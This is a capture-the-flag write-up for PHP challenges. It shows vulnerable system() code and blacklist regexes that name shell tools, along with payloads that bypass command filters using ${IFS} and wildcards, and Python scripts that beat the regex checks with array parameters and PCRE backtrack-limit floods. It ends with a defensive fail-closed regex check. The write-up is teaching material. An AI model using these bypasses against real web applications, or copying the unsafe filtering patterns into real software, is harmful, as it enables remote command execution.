1.ez_rce
```php
<?php
$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}
```
```
?rce=ls
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
    $flag="dzctf{test_flag}";
}

?rce=ls${IFS}/
?rce=cp${IFS}/fla?${IFS}a.php
```
2.ez_php
```php
<?php
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
        if(preg_match('/.+?SHCTF/is', $code))
        {
            die('no touch!');
        }
        if(stripos($code,'2023SHCTF') === FALSE)
        {
            die('what do you want');
        }
        echo $flag;
    }
}
```
PHP intval() function explained: how the intval() vulnerability works and ways to bypass it (CSDN)
Bypassing the regex match with backtracking
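```python
import requests

# num[]=1 sends $num as an array: the [0-9] check does not match it,
# and intval() of a non-empty array returns 1.
url="http://112.6.51.212:31842/?num[]=1"
data={
    # PHP rewrites the "[" in the parameter name to "_", so this arrives as c_ode.
    # The long run of "a" pushes /.+?SHCTF/ past PCRE's backtrack limit.
    'c[ode':'a'*1000000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)
```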
Compare this challenge with the one below:
```php
<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
    return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){
    if(!preg_match_all('/but.*how/is',$as)){
        if(strpos($as,'but how')!==false){
            system(process($code));
        }else{
            die('tip: backup file there');
        }
    }else{
        die('NO there');
    }
}
?>
```
```python
import requests
url=""
data={
    'as':'but how'+'a'*1000000,
    'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)
```
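The difference between the two regex-backtracking cases is that the former uses the stripos() function, while the latter uses strpos().
[PHP] The differences between strpos, stripos, strrpos and strripos (CSDN blog)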
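Both backtracking bypasses above depend on `preg_match()` / `preg_match_all()` returning `false` on an engine error and the challenge code reading that as "no match". The following is an added example, not part of the original challenges, showing a fail-closed version of that check; the helper name `regex_hits()` and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not the challenge author's code. regex_hits() and the
// sample inputs below are constructed for illustration.

// Returns true/false for match/no match, and throws when the check could
// not be evaluated, so a PCRE failure is never read as "filter passed".
function regex_hits(string $pattern, $subject): bool
{
    if (!is_string($subject)) {
        // Arrays such as num[]=1 are rejected instead of being coerced.
        throw new InvalidArgumentException('subject must be a string');
    }
    $r = preg_match($pattern, $subject);
    if ($r === false) {
        // false signals an engine error such as PREG_BACKTRACK_LIMIT_ERROR.
        throw new RuntimeException('PCRE error code ' . preg_last_error());
    }
    return $r === 1;
}

$pad = str_repeat('a', 1000000);
$cases = [
    ['/.+?SHCTF/is', 'xx2023SHCTF'],
    ['/.+?SHCTF/is', $pad . '2023SHCTF'],
    ['/but.*how/is', 'but how' . $pad],
];

foreach ($cases as [$pattern, $subject]) {
    // Loose check in the style of the challenges: any falsy result passes.
    $loose = preg_match($pattern, $subject) ? 'blocked' : 'passed';
    try {
        $strict = regex_hits($pattern, $subject) ? 'blocked' : 'passed';
    } catch (Exception $e) {
        $strict = 'rejected: ' . $e->getMessage();
    }
    echo "$pattern on " . strlen($subject) . " bytes: loose=$loose strict=$strict\n";
}
```

Whether the padded inputs actually hit the limit depends on the `pcre.backtrack_limit` and `pcre.jit` settings; the strict check either matches them or rejects them, and never reports them as passed. Bounding the input length before the regex runs avoids the expensive match altogether.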